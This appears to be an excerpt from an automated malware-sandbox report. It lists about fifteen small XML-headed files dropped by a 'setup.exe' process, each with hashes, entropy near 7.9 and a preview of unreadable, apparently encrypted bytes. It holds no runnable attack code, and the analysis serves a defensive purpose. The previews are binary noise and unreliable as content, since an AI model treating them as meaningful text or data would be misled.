              Preview:<?xml...1=h..v..C.?f5y..n..%37....S....7...) ......Y.....A...fc...... }....^s..p.....6.!*tKat...*m.4...X.E._........(..+kzJ>.1L...,...l5..`.X..d..9.@....*......\....s..4....v..7"I.+c..eSO.b.A4..-..l..Qe.^..../.3|:....9b.k....c....2$......$...........Rd.)Kd.$.....%c...r..t.].p..u.....]..Bg.'G...u....},J.mr........DG..a"..MS...%.......7...{C...q....|..2...(j..=.H.K...w..=H.,.n.......K..\.u.S....(.o......a2...y....m..,..I,....)..........+.r.c..V.!Y.&X....6,.qm...9-. .C..pKR.%..'.7.%.0..QJ.]..pE....W.....j..@.j...kK....7BG.XC.>...g..82.=..g.....M.9..r.=.@J@..>|&..P..I7..i6~u.A.*../......a..P.}..44U......p..M..2y..5..l...J-.6..a....x.u.._.X.S...3;.....@.Q$..!gl,..F........&.u.\.(.._...?.6.r,..K.jH.V9%.t1F]jX...1....'.@n...7...9Mu...u..j...T.....Zgw...8B..~{.)....W...d`~.VT.1.f....W......Tq!+..P...........X.o(..N.UZ..1...L..}..D.i..-.}..d7..................0$9oP<....S.a....O..A.].....#:.<J(....e.,.IFaaR....'.D..^O..E..y.Dk.:.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1693
              Entropy (8bit):7.884209258340553
              Encrypted:false
              SSDEEP:48:/HO4iSUaHH3Wst53xnHFZ0j8PlyNj3+GUwf6BzPD:/HZn3hfBnHFZ04dytTUDBX
              MD5:D908371D80111B1E20AC247067DC38E9
              SHA1:87EEE3DCB9F63023CB84980DA63B0874CABDB561
              SHA-256:BA1E9A3F9019803A392C9E6C4F1B532A5D946F1C075F38E1C9D8A2AE70D32DAB
              SHA-512:60C0B20ED0EB102AC49B0D6BB005D44CB1F4D5330AB0045B8EF9A37B6D59EADA1F0C64DF1C0C73B60AE655B21A395D4F58D1C28427BFDB5021D3698DCF0B1617
              Malicious:false
              Preview:<?xml.R..{....%~\..zG~.W...X...Z7..9........:de%.._8z.*5|.Uo..v9......?.....s....].8..-.0........}...-.].#HX...~.V.jw......GH..4...v.9..Iql..v....+5`73....+.X....i.....i........x.N*i".d......o^tn'.w.i..'.]...~.N)..|gw....."O..n........X..J..<..#.t[..~...3.....w@.}A.W..Z_i...,.K.u..l..).F..-.....R._.Y.0K7.n....L?f..4.).7.MU. \.g...E.l...b...m]..!.....D.B..n...'....)..4b(,..n!..u..EQ.@..`.`..Os+.J...B..YH.'.]w}d...o...V.......G..l..E..\r.+E.*b.mm...1_...U..y...X.....5....b/.B ..&P7..k=sl.p...g.,.v...A.f...s]*bL"...U.LTZH. <..cZ..E.".._G.<.F....1j."xsU....a-......h./..O\....f?@.=z$..#.D....N+..*^).G.g:.......F.T...Lq....Xf5.b....t..l'>8.&!!...j.73.N.6...M.z.{....O..2.4._.+O...7=3.O....Gi.....b.2.....8a....%..!v...f.fv...I.n..>q..(p.......?.3.6.....7.`!..@.f.}*.?.h.....F....f.... ..;.q2zu...".$.__S..E.)..ZH..!3.\XMP.WU....... ..e.K....S.@.^..+....L&._,FfJQ.l..20......Z..xi..9..O...pj...c..Z.IZ.<../}..r..........H...?.u.<...... .8...U]g.fK.1.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1730
              Entropy (8bit):7.889151994381275
              Encrypted:false
              SSDEEP:48:kahhy8Zx741P6003wLVRf6xKRx7atftXrQoY5rD:kah5CPPRJh6ER4177eH
              MD5:444870370659AE436193175CCA43E164
              SHA1:BD4E1B13002520DB38D17C9AF8B7472AC7CD7CA8
              SHA-256:3BD71A9D5D07576F4532DB684947F4E87783B89759A7F721FFCCFDD466C2169B
              SHA-512:8FC37F887A5B58A3F17BBEE75C777F4D7CACD6C501E01CA2B9653B125E67650911C52AB936D5C2900E8635AAF39ECF5F86FDB65AFE99D5139ED43C6437449F19
              Malicious:false
              Preview:<?xml....w..P.65..f-6.....g.qzO..r.>..........xoZ.Y.c..m.I(....(..2....`.kW.o.g...|y5b...IK......4Z7i.kL.....Z....o.d..O....Hf.}..HH..K~.}.W)........1......6 .W.=..:r..j....y.I.....y.v.`.....,|.......`...Lpp........n.^a.....u.w.v..-..'a6.>.wb.\...c......K....,.../...|V..[Q.#/m.....v.f.;.......i.L...]+.=...q...W,.."....d7.!..*.n<....N..4...PC<.9..k$..../z1.........X.......&.).F..y.4....#../r..e..N.8../....U^=0.,..).h.Rv%.Sr.[.....(U.D.Z......0Q.T.....4^|.g.z.....+.9..5..f~..Fcv...~..0.&S....e.g..1... 9..B.6....{.....6.k..J.._.P.6..........8.n....;.*A+.B..\..q.m....mwX......=W._J........2..../+..,..N.9*...U.(D..<.Sd...e26..e...D.....:.!C-m......q<D..E..n.....gJ.........uQ>........U..2..?.N?J.|f...P.c;..~..xUY.. ..ti.a..t2_..Z....\.C..'M.2.=s.r.E..&O.^.S2.X....F.\...&G...Z.O.Gmu{....R5....8......T.a<.....Br6..|....mc.SdV Q..s....sP...z...PA.....Q.<.l*.l.a|.+#.....Id]-.#U!...ZQ<.m1... .e.+.......b..........%.+..W./.S@n....YQ...h ....xU.xPt.U
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1711
              Entropy (8bit):7.873742976661759
              Encrypted:false
              SSDEEP:48:A14d5Z5MnKgHFHGCYD3fr7PKJ/x14li/Z3VecD:G4d5vMKglH2bfr7Fli/Z3YY
              MD5:A28EF08BDC3192147B1CF950C5601AA7
              SHA1:1220A183A1A6D5EAC07DA13321D87AD266C89DC0
              SHA-256:478DD48F11FEBE7425CA68CF0A15523CEF3FE7760410C850416A120DF29B0421
              SHA-512:4A53F10990F4DE5BCDBC901696467339388EAB003A731B859E7AE10A7B466EC194571EEE8E16E6EEAC09947BC8E390EFAC4549E490503A09CD706DA53BBAA074
              Malicious:false
              Preview:<?xml+O'.-.<..?..^..8Ef...Y........!..l.]..t..s..0.&%./l.#..U#...........;..z.xAD.*[.).w+|}.'..0D.5..........V...j2.?....C.s4..?.fI....l....b........m5.=.......q..==].<^. .\.....T.]^..!Q..T.....u;....L.../j.a?.<......M.$J...<l...0....6v...H-.V.5(..!|i..o..i.4.y.......}}.....C-.......P.....k.,.....,........2.H<.H3..Tn...........K.g\.m...3!.2.B..ru.?....."...P....w./.!.a...2..+.W.P...l.F8G.A...?.m..y.y.?.W,.q....V.4".^.B..:..t."w#J.4.x...>.%..$.J..k.........5.0.."...j.6v..w^.W....O...Ex{.E.Al2.a.:w5.a.....HC.l........~....s.......H]TE.......?...(..lv...b...#...G.".ic.......*...w.%].yP..92.x..&=..v.X.m.+)......Z.7...7..W......)..PI.............9.R"..n.+..#Ale.....+....[.0..6..{...7J.*....:...c...:.Au..(h.*A&.s8.O'm..K....X...6n....*...t.^..P ..^.}My)E.v..p.L...IX..P...M ..B].$wx....A.r..f....;;6..H.,Z..o..bQ.~....j.n....p.[..,g.S#..{......w..f........BQ..".b.+...X..e.z.s.[,KC.v.d.U...aY..K......3....M.b ...8..H..(Y/.$A...T.4".<H]...X....D.$\|.f
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1748
              Entropy (8bit):7.903995118192774
              Encrypted:false
              SSDEEP:24:XOdB+ofsmz+dFDb72ubfJyi7fJbTQ3C2W866pqE+q6ZdL6pVu7AGhHinFCrGKyj4:4B+i+D2ubhtMb56Ev6Z4VIhCnFCrGuD
              MD5:589D28AB3A0CD235773099283A698DD3
              SHA1:D7BE49D45833C1FF14941DDC20E3837387FE2152
              SHA-256:79C1E98206A6071045B323F95CCCFBECE484D0CDDB9080EFB31811DF9D107AF9
              SHA-512:3AF9A2E82AC3C8C6B8AD30B882AE572ECC18D35B981E02416B16231D81CBE8AA05E6158A1AFE5E33661F6FF3C797E3354D160E46F351E40DF81566006150D2C2
              Malicious:false
              Preview:<?xml....p5..E._..r..H..?.(.1..../wp...^...`V^_.Y37.20.9F"I...S..)s.Ma.....y}.. y.mu24Z.x..72....Wf..A.NK.l.......k....{.|.p...t....w.!.Spd@e...ReJ.$.R...<.v..y....!.d._..CC*...[...}...I.?...*.[.....WK......8.b..tl.m=VX..w...s..ksI.,..zA..c.....j....PxW....#...V..a.m.m_..R..n.....>.V.'.mj...qO.)GmB.y.....V..c(...4..o{IO.E...`...8z.,x.-=qo~......I3..;..r.g.>. .@V[J."/TY...{...~.=....D...I.......24.-u.*....PZ...*...d.0.=Qx6u>...[#e..*......+..T\.~....#i...Z.'.../..j*..i.....^....q.,.a-xL..[X0...c..0....~.7').]p}..yC.}..>#.h........p&.[W....0.......Q8Q...].......M......bGwU.j.W..$.\.;N..;.{..@/.e..&..=.1.2...)......P....l..@.A.|.5....@.4..V..|..... u.......B..2..~......Qu.DX...q...^.<..p......F.....u.......F.1U.,..t6...c....Q....G...!o...T;"..x..`..k7.....G7...P.. _.!.H.g6...q5.U..'%...d.&}Z.;..T*P..bS.ea./....!..v(..1.F...k'.kH.@t.?.|Z%......(c~T...)...#.........qN...`...z.eJ..Y..0%~L...!E.8&.9@m..O.`.8.!q..j..t.v.....mI...5.J.6;9f.P.N.D..j..}....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1711
              Entropy (8bit):7.865353916617561
              Encrypted:false
              SSDEEP:24:92mJ2N722Cc79TpUr7meOmNqg5O6p8xqHVLFa4sm1ClXSOWAHuoVIbD:ry722C2SWHg5N8xqXwqEicHuo0D
              MD5:85404F62AB9128A6E8205EDE041E5221
              SHA1:942114998C70512871EFD37AD2CA8E4838792743
              SHA-256:91E47887915BC0AA37573BF71546AC58C2D3A782FA50B5026BBF4F21B124D0E2
              SHA-512:32B7825799500AD318D19E5FE4F7853B4056246F0EFCD5E199468798C8237BD8C73D241D680622604F7616FE4FB71B9EA4A3E2AE0A86DD4D08FFE7B41706287C
              Malicious:false
              Preview:<?xml.50Q..........2.....=....fG..#..4+..x...v...lL...u.R.<.MT.hB.C6..F[..+.............)H.*......^Y...6....U..fI..?.'.W,..9; -C.T...../...D.T.Hqm9^#..gA...).s...?..C....9G.....V..z...Y-.q#.u....I..in#.....,..}..cO2|.'pY.]\..Z.i...2.6'U.i.....J...f.....0..}I.....KB..y..:............6....E...]T..q.p6[.....`\y..4....J.'.....8..O.@.wTr..W..B.0.~.s...\cM......#...:d...M.nq`.....t...@/I..i.\.~B....~..?...|....E...Y}.....AI4F.8.4....Q....)v,;T.C.Ga(.*....d>..G..-..R.!...V...r...;..~......K.Q0)j...[....M...s4.H'8...-.yObit.....i......q..S....fd..W...+mh.X<...^`..'.......].#.._..f....6.).8.34 .hq..Y.39,e.:..A9V.Kjm..?...5\......e.@s1...`Y&.l.}-..v...$[m.R.W_.E...i...^rW.6.zk..$...O....U.-q(.R....ptW...._L..p.....A.I..kL.M...]D..[|,..>..@..'.s8..L4.P.G..m...z...Q,.7..P+.6.y. ......?..B.H..,.@eP>-@hk2z....m....n=sG.>...]F.|...:J|@kx...."..wxx...../).Qr.oc.)...GF..$.h.......jC..k,..x.L}..8G.z...........3..J...?T..p..<D...M...98....(..o.wR........!L.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1748
              Entropy (8bit):7.878381325445975
              Encrypted:false
              SSDEEP:48:C5vBEAEJ/hqyqV4HWxVUZA16ebwGVzKKSEgDGL4dUky9jKOAdD:cvCASqpsZGwGUVhDK4+BIOI
              MD5:457D6211F0DF2ECA37F71C54BD5EB834
              SHA1:50034FD599E67EF4278F458B8DD074D80FC7E078
              SHA-256:E54151B23BB582F4F3F2788A61D40058E5BEBCC9A2A8E8196240A838012B91FA
              SHA-512:8D6FC90CEBB6E4584C3C8A943C8BBB63E4252F9FF02576F26266D071F8E6CEB3EADE601E4911108D7D9D82FA27F598EB8C1B219E52D602EE6E83711B7CFB8C96
              Malicious:false
              Preview:<?xml..[....-Z.-j......j+..ug0.AODs.I....Gh.w.n....W3....(...|z.[.@L<t.p/...$.o...L..e>.....j@.8.)0=..W..H..nF....~..D....t.......r.g.O...e.8v.&s.s}.....6 ..+4%.b..5........+........]q.CEKSFeT....Y.a...G...<.1o".S...O.M..i....y....|....1C.....!.q..e.>.I.+...=.....-W.........R.Z"s$lz'...b...Ou]..c.=`.o..6....l%K..F.v.6X.3..p.Nf.y...q.{....n[...M<7|....}|n........WO`"....#._4....I^Y.(q...3.(0......$......pL.I.+*........\.|...AiI..U..F.E.e..O.fw....9.........F....."6r....hB.`...h.R8..1grk...%..E.M.>...J..8...<.W..:C.|..H.K.p.hP....0...#.3.3..y....E...3U..M..<..i.~.Z(.0g.<o.`.`.D%j<t........-u.....SM.'.>.N..)6..%...,...^......Z.,.~.p.Sz..I.4.j....:..5;.....?.........F..29!.S9w@....j..f.ZS@...1yCmBA.MT3ca.....'..;.>.n....i......../.Z[ed...*.@.?.]I............b0.p....6M19a{...k.U...A..Uq......r...a}AnZ.:...!{.;..... .|r.~....g..=......Pl.Dg.F..,wW........7O.).....,..t..DO.-........\.....zs.w2....!..%.B.(..Y0.!....T)@6.,........jE...d...D}.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1705
              Entropy (8bit):7.882263438560442
              Encrypted:false
              SSDEEP:24:Kq3y1loSBhj8bA02isalePvfLV5mZJZWXEGLNUXRB5dmcOjcIeYn7iR/sRFybD:Kq3y1lNO+NeTWX/oRDkc1TEgD
              MD5:1E60377FCF405DB3EFE0AA4936DE387A
              SHA1:D52ABBAEE3084175F8986C6A889EBF20285660AB
              SHA-256:4121B527B35E5D66729A1BB10A5CFE85CC55E0F935F5CE30EC0B40D9A2163DBE
              SHA-512:2B416246A6E9DFBC1EFB40EE881E5338F3768DFC18497C0F6359523F569FFA9AB17A97D4EA1312C8E40EABFF19D16776FCBF5E06E692442C7DB613097C358225
              Malicious:false
              Preview:<?xml.....[.....U..AP`C.w....N.oY..j.O.e..f..l.6...#8./K...tDb.......O...'.,.e.e..t..<j.l[[....s.;....k.._..{.~.,.......'k.\..m0......4...9..U*...K%..bQ.}..#w.J.%...q..V,.N.TH.QBNW..PSi.6../....zGt.......Z..[.DN........f.W....b....>......"....X.....0..J...l.+.(.1.Y..ND.....(.<z.....GY....K..J..S..@.k.C.XJt......l. .&....V......+6ro...)V..q...|Ex{-4&..s..lU..y...K......-.K/}......|.'.......W.%.. 8.....|.]q..Z..W.q.7..z.k....h.{:...K.....b..xB.A...EP1....|.N.'..'..$.0..f..C.b..t..?...@.."d.LmT...K.u....U..i$.$....n....L...gX....|#....t.....b.......%]I....._U..z..i-....l.J}.T.....4b..O.9#......m..x.....r[.L..../...\,{.x.>=....D...0N(.T.i.2.7..ZvK.P^6\#*.6..H..Jd...@...E.B.....#..f...}.<rs.Y..#"t..."..o{.d.T..F..Ovt.+...j.`..C.YJ..\..'J..zfS..o..../.M.D.Gx.0...11.Z#...&snp..wI...;.br$.K..M\`.?N.~E,i..%.....J.<....6..gP.l....2..!.............I...&.E.j..<.C..F......n..FQ.(S.&.ic......._0a.t..."7..<.2."..>.|....}.~h.e.l..^...o.....#U.Gr.1.......Ai{
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1742
              Entropy (8bit):7.883344676389241
              Encrypted:false
              SSDEEP:48:0w5faIl6TTtBQ7gTUR4DS5XA40gbLTuMdOycQ8PDJD:baIl6dC0wp5XAfiqMdLDkh
              MD5:0F1A8961CC0A0BE644EB130DA74954A5
              SHA1:3A3FA69C30867FA63D3BECA76FCD1086F2C98402
              SHA-256:54F630979A882FBF5877263F8FCCB180EF5C3490678322076E829A4B7A0C2384
              SHA-512:5A07EDC71F9226BA018C1BF7E3F2748B363948860A157186C1DB72A4F106CB231D2118E56FB652F78482C41D200A634823966AE493658E85922233320DE093CC
              Malicious:false
              Preview:<?xml.g....^....X...h.U.....L.z.=..i...Y..`..M.d...B.|.+`..!..h.XB|.z8..3?r.....h.`..:1.........9..LH.......yX....{=.....UL.-...&.....t.....F.I...JT......GQ....p......97......C.N4e_...,'...QU...u..$.e~m......4:....I..n..`$J..H...........2...o.m.a.c.6...s.R.../..#a.Z....C.B...qz.Rp(-.'...y..3.}7g.Dx.W...tT.....Z....XBW1c..pp...U'.........@.BN.L1......G.no...h.=....2....;...l.._y.<iAq.W.~=...h.`F....0.#.d....H8...7..6l..m.Q...O.`.~.....p...x..9.G......#.FS. ..).c.4..$.)0C.[...3i+2~..Or.]....q..lg.].+...E..K....~.S...H....e.X....q.EI.s|.'..{...Y......"*...`.c...Q..G.|W.....^e..#...FY.(.{-.)..||.E..z..&tr...4....wM.klDt./.=..Nn}...\3:#......E..6....X.*....".[..x....g.O...N..km;&.*\E.."%...#.O..>4.."....w..F......b....c..]..@.7[93.:...z..`.).SEe.8......+G....>..-r..s....1..)5=Cs..+.W..... ".....:.0J...ndo..........n..Cn9.....S%.....U...W."....,.X. ?.....5.s%(....,..uZ(....?...`..Nq3..jZ..#.O`..;5.&.)R:....2....e=...z
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1691
              Entropy (8bit):7.8868774290150805
              Encrypted:false
              SSDEEP:48:ibv5gejAr7pz0VYUGMGqr4uIGhI/QgUpGcF6D:izer7pzATd4x/OFS
              MD5:4EA41C27358E114A421E3F6963220927
              SHA1:B00DE3821C505BC723F81E751B0B636E01B248B6
              SHA-256:513B3CFE0D18330AD0120D41146BDEA08C9C4827E17D0962A6401FA5F60BAD52
              SHA-512:2EC5BF35B7E44826005EC4C3E2FE15976024C41666FFA6D6624416AE94D24661EF79829BC39F8D2E0E8BC8FBD447C71F0E9692767CFE25F5C11D287E90F9FD93
              Malicious:false
              Preview:<?xml.}`....wt.....@...n.W[l.fI ..;.[jpk.....H:fQ..a...l...^..u...>....az=.T..3.S...).u.'...r}}vY.....\./.Y....3n^n|."Df....:8,......rO..q.mwY..c.f...Bw..E...sb.3....Gz.V..X.......(..<.....=.&...g.z4..T2..T....'/...C.B`vd..s....Ht..7b.C.W.3.......y.%Cv...$]..9..E...9..N.A..7._S...Y!&...^l..M...}..x.+@..I"..X.e...[r...h...o6..,.8.x.p.F.nAYm..a(...TJp..X..,.N.^.}SK %...3..U..(9.....H.l...w.."..]&....N..5.6Y........-.y.q@9.w#.61..Z.0].....1t...-....,.).1:.)...?...........H...\{.96..[Eu.*..bt&.U..N.-.x..W...6.s...6...."..._8K.........(.Wp.)..`.G:...6.) .a..B..da...o...h..&.8.s1.v..#.!...yc..rx=...J.r`LU}.]..QI....,.|...4...E'.g.:...Z.5e'rzh.,..xS.#.J&s.\...0..=..xu....;U..y..+2.KU\....:Z~.......Q.\...... .?...C.W!.J.\....9.J$...j.qQ.6t.y;pS.K...........aP.....5"...Yy.n.."f.K._....c.J...5[=.....kw.K...t$....T.(p.8..`...3.+.)_...9......q.....=,....e.M.........-.9|p..M.`.q..b>k.?..._.,.@......h'........Q.`V...=..X..].$1.c.. .]...`.*.... ...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1728
              Entropy (8bit):7.877741606389799
              Encrypted:false
              SSDEEP:24:eh5Okk6SksQ9tBcy5shiabEotX1EBYO4vwZrVMb+mgyfFAZw8hTX/pXZLmFyzc3P:B56sQiyvavCiYZ5Mb7fFj8XxXZLKQcTD
              MD5:C9A679394118EA285CF9664F7F8DFB75
              SHA1:CAC601F8A74447BF6DDDD0EE484BD17371B5B572
              SHA-256:06A296CD727EA409556EFDDDA5A5C202AFD23C95DD7AE7741CDC73F94A0001F3
              SHA-512:35D343BD9E8AC015F56ECC7EAF4F65A203F507D3FFC08C4E20FA77BA7474DA4909AA4EA6C04B4A8C09E9902C706AFE007270357447DD8E3C7A383A7ABA1114D8
              Malicious:false
              Preview:<?xmlD..<a..N.?..Mm.`q....r+.}..E..T.(O.......;$,=....}...~..S...Q,.9C....!.....e..OC..[g.Q!...'....J.2....^a;*x..(:..].W.y.g..>...3...n...0...5......S..D.w....#...H.G.l...S jo%..d...2...%....V.S"B...z....d.....5...N<P...?s.oAp...`6.R.6[$fK..$.}.d..)..e...0*.....P.N..Z.l......!'v..:.B.7..Q..V.6aR....:(..$..f)..h..dX.J..QEo....)*:...L,..B.2@P..`..r...c.1..?..tF.0a#......t...Pq.J.......(Z.sK..03!..{JA{7.........T.J..n..z.\....x..9.M.4S1.....\.N..VX....A4D(...^..8~."d.'....4..U..|.@pC............4....]...'.;w..~UFN.B.yG....2.;.Wm.r. .....+.Q.D.......*.:...{...uQ.B.v.%...:n......E/.....h.j"............t..8.WY...4.......<^..." .:F[I.19.[../......u.Eg.y.^.C'...d2....v...E.'.Ams.P..Ks2. .?..8/n...o...!L?...h.].-..6s.5L..1.8..S..J...[.".........,....i.B./.:..G....c..E.....Oj......C.O...>rw..........)W..Q.,v.au.&1..}...X*....D...p<S.}.~...'.7&..+_.vE.v....j.S6....Dm.zY...O....L....<..".t.........^.....O...k...G!:.u... '.\E..kC<&8.D..~...HA.:]D...~^
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1700
              Entropy (8bit):7.884829827486013
              Encrypted:false
              SSDEEP:24:Ru8hR9kUTLPC0142KCvlJQ+WSquXRaC+gdtb2nzBEGIL3rt3HJ+4sAmJNSaRXoYe:hhIV0KqDQSq0AgKtEvtY4sA2NZRLGD
              MD5:30DBE49A07AF782BC001EBA575BFC4E1
              SHA1:74A0616B2C004DCEBD085D3D26FA5F6EE554CF2A
              SHA-256:62048C81B59D3DF833CE92B845318D74F754944CF2102A26EDA6A6A979E62EEA
              SHA-512:8CC21FC554CEF9E6A185E1C2C1314905F0166D494BD2892DBED2A4D7CDA7875F1DE2337D6752909EFA399F36177C866C18D97F8CAC61D3D17F8675CAEAC827E3
              Malicious:false
              Preview:<?xml.....N........~.g....%...e|.PH.9|..-..J.c..0........X..R.....i..t*.Bk.....O...[~. z.M..*K..-...R.&.5..i;3.zAr(k".\m..g..#.7..P8..u.9...4.g..6r=.k1/B.ba..hT...l.Z..1.DY^..i..j......../L.W...nN............y.j!4'o.......P.K(...Qf.".S...@.q...Ar.gEL.\?W..".U......%..CNM_.....Z@...W..[g.1_....n,.....k......PFw...4."[0*..me]...<.b.pV.DK-..y....p^......p~.4..Ed'.=..7.*...:...........MQ....[.r.%...!0.M$.f]^.2.p..[.6.+M..I.....H...DH$B...C..S..>..:.t.p..p....@.Ob.z..@......5.%l1.]......Ml.)2....s..md...&.!Je9....e]9_9Q.".i..ue.0@P..N$c...S_.s.v...%.Rz.C............S.!.J:...!.Y...D.`.........e.I</.Q..-.....Y.B...VNU.lk...u..T.C.]..._..;.ok...Z.........'.=....G.M."..t.........;hPPQ.>n~...I..a../o<.............'..T.(........g..........72%L.S..YO.2#./.......`1.0..B..fA){..V......[....;.t].,.............+..F.3..On..q@..D,...#7`...G.@O.:..k.H.A.9.6..D.#...=..!.5....[.i.C...^....,Q.\..3.=z....b....-..hP't.p.0j.(.4..G.g...1/-..<.m5...tv.^b.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1737
              Entropy (8bit):7.8960511508435784
              Encrypted:false
              SSDEEP:24:QDL1pnoOfjzHA21yBDLC/ks47Ufxrd3q/3jmT71WDChpuVnLJ5zmO7oiLM/GSE5X:QXoYJyBFx3jW1CCh8VXSOzKeD
              MD5:8F7AD32DA474EC41F3B591DC2E22B4B9
              SHA1:DEEE615BF4C60D02927DED6373CC97327F1FEB85
              SHA-256:A6FB9014C362739DEF89D1F231B266E63BC7EDE4DBD323E7036C60692BDD18AF
              SHA-512:0AB28004E1434A0457768248939A7F28B8F4A377E882C20FA72AB8CA23A01103D2D82494AB024957832AA1F7C23070591A30A1FF09CA54338030D08770FB599C
              Malicious:false
              Preview:<?xml...k.&.....K/....C.u..,x"..Q.r2..1.i..!..n@..1HjM>.....u...{I.Z{R.y....>.l.o.t..n..6d.o.@2.0EQ...u.+..@........I../.d....t.k.....y..&.........a}~..4.F>...0...J0......^..z...".....I&R....Y..vK..|...>....V....Cgl@efN.o.3+.f..s..KY.YU....J[..Q.RQ..=.c.[aXR..3.c....OE,Ea..(....*..w.D.F..........$..)........w...\~w.....vg..T..w0]~.....[.o..;.W.}...+..P.7...$.../.+"AD........Jb..$.*...4]p..M.!M........eN.....@=:Y[3.|....D...a...b.$....._..{.$......8.*.p=....'R....#..B.lZz.....+.r].!..Ji..HG.ZN_Q..yPgo....X..9G.h.$-....w...Fa....G.6...`..U..9....Bd~.V.G..7..W..R....q.O..5.3......{`...)._.......9Xv..Y~.....So.O....+..(.x.....T.G....W#_....9....w.;2.."..I$./F.[.N&#\VX.............x.-D._p.......,....>.O.?l.1d.a.M'Vh..J+k?..W5.......HK...@.{.....B...#`.p.|...%G..v..)5.....D...7*...#.!;.{m.B.......\.^.E...it....}..>.p.c.....y.5.Y........Q.|..!$.p.I....V..R..... .[..4+.Q.....K.]...d*..BcdO".[..v.t.yL.\...v....O.....[..hA.......>.E.?.}.]...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1699
              Entropy (8bit):7.866535097077356
              Encrypted:false
              SSDEEP:48:AxeJq4LXN/Qiv2+QAiyOjhSwVBm2DrYNLVD:rJL9/Qw2+0F5Y2vYD
              MD5:F799F0739457A27E25994F58D35BB432
              SHA1:F64E4210566111700BBCF3767DD2C269107F13EC
              SHA-256:EC1D479D7E65AE21F17A569E3CAEA4EBE8C80A0F905BB40A7ED7D88F19304242
              SHA-512:6A100712B4249A4F2E279D21895C90E00B6805B4257044A2B3E6B0DC8D33720C94E271A930F2F8DF7EB81ADBE8024DAC547304295B8F7E52A27570E5B507F301
              Malicious:false
              Preview:<?xml.#..9......N.|mC. G&3......s.P......pz.....D.n....leL.....v......H%.!).,..Z.@n .L....W..K.\...]......#..Wp./.}B..0..\.fo.....UOYg....m..'Y.MbN..i...b^..Z..D.....F$?..6.4U>#I.......H..}}S.~....8=....OHV.d.. J.E..f...L....d....;nyt.^..rcdk...O......R:.#..*n..-.JW.js.`...5.Fo.5<..nL.......A..Y-...Q..g(P@i.0.r'b....2....'C0.d..7.q_......U.4 .u.g.q....E.}V...*x..U".r*...I.OU..j.U.....E.q..3.....T...O!k-........h../.K......M...j..n............%...f..q......b...t.F...Bmv.l..>...X....:@H..J.I..A!.V. f......y..xF,...D8..>.%..S. ..3#W...........k..X.. .<t....(ez(.....[..6XJ.H....A_A..b.<..b.p. ...<a5r1KI.....~../T..M.R.mh..W..;/F..?..!.7...._.rz].l._.t.,..:..9..k ^..f.R.V.}..B.8[.W.!s..5..".......pVkg...q...3.."...x.....S.d..a..gZ.*.W.._.p...{..dC.....c.!..Z....7...U0.L.Q..g".'R5....E7.[.._......-~`...).V......L..M9...s"..F.,..Mx.@..$...?..#....%.J..N..5h}E...:..-O. *.R...B.S....D.. ....t5..P...........Y..wU...R..`_1.[js...}.........Lu...I.o.e
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1736
              Entropy (8bit):7.8937415949195
              Encrypted:false
              SSDEEP:48:VvY0mIsIGJIqXg2IFP3D8N1dyV+n/USBgWvk4D:VvY0mNnO1z8Ym1T
              MD5:EDA6C2E41C42A86C59FA4A0A5DB8E5B9
              SHA1:08E9B642A304D20C37084A7D231C87D3B75BB073
              SHA-256:3190606A87E748FE65BD35ECF05F0AE646AC9AC2EF3D2A091347F54E7894B2B1
              SHA-512:8827BED24061E40D4C5B94AD01864D637C90F2EC388D7F325D9896A0A8EB055E001F1AA23CEB5EEB311C441B66592BA918767A1CD8A708689AE15C3EAFE489B5
              Malicious:false
              Preview:<?xmlL.1...p..B.^<V.2.E.%...{..L.#.r!p....&2.i/..c6V..#G....l.}`.!........2Vp|.`.........!V.r.UjjB..39.TP.^E.."%9].6F.W#u.........w.d@...t.}...y........,.6...L.z.66..... O.....@.......!q.....}^>E..Z.X....|.^.z....u.....Y..9.4n..D$.OI.<s.~k.....H#Z..ct.....Ax..<...c...m..?h.M....S..GC..?.R.w..du.......NZ....x.G......e^>....................)...!.<.As.d..{3.).....1:.8!./..j.3H...UY).P.s..&&...c..q....[.U.Fcc.).R.........&.{/...a.d..~}M...X.S......;..i....7Z./+.I+e.T...{.0.....n>B0...7....`....l-...N.K..R...........+.....R.....}?.b.....Y.X.......O..HC....;....9..X.P.C.c.u!z....I.D.09pk....`m.8.....+..3..!.R.......W.-./B."...-..N..g-z.#.... ]...qs..........B't....^.FO...8..yL.C.^.v..J.Qx7.:M... ..<..V........@X.?G.!.j.....7mZ.R<b6&.`..Sd_U.VM.2....R>Y...K...>...<(S..b.+.>...;H.S.R..h..SXfA....Q?%Q...0.J...IU.2iD.c.....i.G/.*..~..au........t.1.]....;K.!k<......^.-.9f...M...s,../..........e..t..|.......w....s...n..F...nV.k3...a0.G.+u.@.DD|.i.).
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1687
              Entropy (8bit):7.865043786201866
              Encrypted:false
              SSDEEP:48:MVBX38Gc/Y9m6LJBdnhJM5PWoBooKH91qG007CkD:W8Gc/YkSNsKrKHw
              MD5:42F8A2EAA3EEDA4AB1B49915D8FF6DDB
              SHA1:BD53BFC860655F8673BAF6E807BE4911113D0BDD
              SHA-256:18E7D75EA7363C953D878E7A394D6957899537722C5ED1B5AED4B9AD6D9E2D19
              SHA-512:C79058D076D73144433AD564F92B988EABB27C057F93FFCF45096ACB99ABBCFB17AD72ECBE240C8CD8E04382D7B0D3884D102D969ED675753E248D74F4DAA854
              Malicious:false
